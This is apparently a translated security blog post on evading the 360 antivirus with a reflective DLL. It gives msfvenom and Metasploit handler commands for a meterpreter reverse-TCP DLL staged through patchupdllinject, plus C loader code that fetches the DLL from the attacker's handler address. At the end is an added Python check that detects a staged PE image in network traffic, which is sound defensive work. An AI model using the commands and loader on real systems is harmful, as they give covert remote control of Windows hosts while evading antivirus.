First, the result screenshot.
This is a technique that is ten years old, but it can go live as a quick throwaway; the later steps still need improvement.
Configuring msf
Before generating the client, first generate the DLL file and set up the msf payload listener.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.109.135 LPORT=10010 -f dll -o yy.dll
# generate the DLL file
Once the DLL file has been generated, configure the msf listener:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.109.135
msf6 exploit(multi/handler) > set lport 10010
msf6 exploit(multi/handler) > exploit -j
# For the meterpreter/reverse_tcp payload, the callback IP and port must be the same address and port that were given to msfvenom when the DLL was generated; otherwise the DLL cannot connect back when it executes
msf6 exploit(multi/handler) > set payload windows/patchupdllinject/reverse_tcp
msf6 exploit(multi/handler) > set Dll ~/Desktop/yy.dll
msf6 exploit(multi/handler) > set LPORT 10086
msf6 exploit(multi/handler) > exploit -j
# This handler is set up so that the client can fetch the DLL
Finally run the payloads; `jobs` shows that both handlers are listening in the background.
Then use the loader to build the corresponding client and run it.
Here are some of the functions from the code:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

// bFileBuffer and PAYLOAD_SIZE are defined elsewhere in the loader (not shown on this page)

BOOL GetPEDLL() {
    DWORD dwError;
    WORD sockVersion = MAKEWORD(2, 2);
    WSADATA wsaData;
    SOCKET socks;
    SHORT sListenPort = 10086;                    // port of the patchupdllinject handler
    struct sockaddr_in sin;

    if (WSAStartup(sockVersion, &wsaData) != 0)
    {
        dwError = GetLastError();
        printf("[*]WSAStartup Error : %d\n", dwError);
        return FALSE;
    }
    socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (socks == INVALID_SOCKET)
    {
        dwError = WSAGetLastError();
        printf("[*]Socket Error : %d\n", dwError);
        return FALSE;
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(sListenPort);
    sin.sin_addr.S_un.S_addr = inet_addr("192.168.109.135");   // handler address
    if (connect(socks, (struct sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        dwError = WSAGetLastError();
        printf("[*]Connect Error : %d\n", dwError);
        return FALSE;
    }
    int ret = 0;
    // read and discard the leading bytes the handler sends before the DLL
    ret = recv(socks, (PCHAR)bFileBuffer, 4, 0);
    ret = recv(socks, (PCHAR)bFileBuffer, 2650, 0);   // break here when debugging
    ret = recv(socks, (PCHAR)bFileBuffer, 4, 0);
    ret = recv(socks, (PCHAR)bFileBuffer, 4, 0);
    ret = recv(socks, (PCHAR)bFileBuffer, 4, 0);
    // then receive the DLL itself into the buffer
    ZeroMemory(bFileBuffer, PAYLOAD_SIZE);
    ret = recv(socks, (PCHAR)bFileBuffer, PAYLOAD_SIZE, 0);
    if (ret > 0)
    {
        closesocket(socks);
    }
    return TRUE;
}
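Seen from the defender's side, the client above pulls a PE image over a raw TCP stream on a non-standard port. The following is an added example, not code from the original post: a Python check that scans a reassembled server-to-client stream for a staged DLL, validating the DOS and NT headers and the IMAGE_FILE_DLL characteristic instead of matching only on "MZ". The stream layout (length prefix plus image) and all sample bytes are constructed for the example.

```python
import struct

IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
MACHINES = {0x014C: "x86", 0x8664: "x64"}


def parse_pe_header(buf, off):
    """Validate a PE image starting at buf[off]; return its properties or None."""
    if buf[off:off + 2] != b"MZ" or len(buf) < off + 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    nt = off + e_lfanew
    if e_lfanew > 0x1000 or len(buf) < nt + 24:   # 4-byte signature + 20-byte file header
        return None
    if buf[nt:nt + 4] != b"PE\x00\x00":
        return None
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, nt + 4)
    if nsect == 0 or nsect > 96 or opt_size == 0:
        return None
    return {
        "offset": off,
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsect,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "is_executable": bool(chars & IMAGE_FILE_EXECUTABLE_IMAGE),
    }


def find_staged_pe(stream):
    """Scan a reassembled server->client stream for a PE image. The image may be
    preceded by a length prefix or other bytes, so every 'MZ' is tried, not only offset 0."""
    pos = stream.find(b"MZ")
    while pos != -1:
        hit = parse_pe_header(stream, pos)
        if hit:
            return hit
        pos = stream.find(b"MZ", pos + 1)
    return None


def build_fake_dll(machine=0x8664):
    """Constructed minimal DLL header for testing (not a real stage)."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", machine, 3, 0, 0, 0, 240, 0x2022)  # EXECUTABLE | DLL
    return dos + b"PE\x00\x00" + file_hdr + b"\x00" * 240


def build_sample_stream():
    """Constructed stream: 4-byte length prefix followed by the fake DLL."""
    dll = build_fake_dll()
    return struct.pack("<I", len(dll)) + dll
```

Run the check over the whole reassembled stream rather than individual segments, since the image arrives across several reads.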
The full code has been uploaded to Zhishi Xingqiu (知识星球).
Originally published on the WeChat official account CatalyzeSec: [AV evasion] Reflective DLL bypassing 360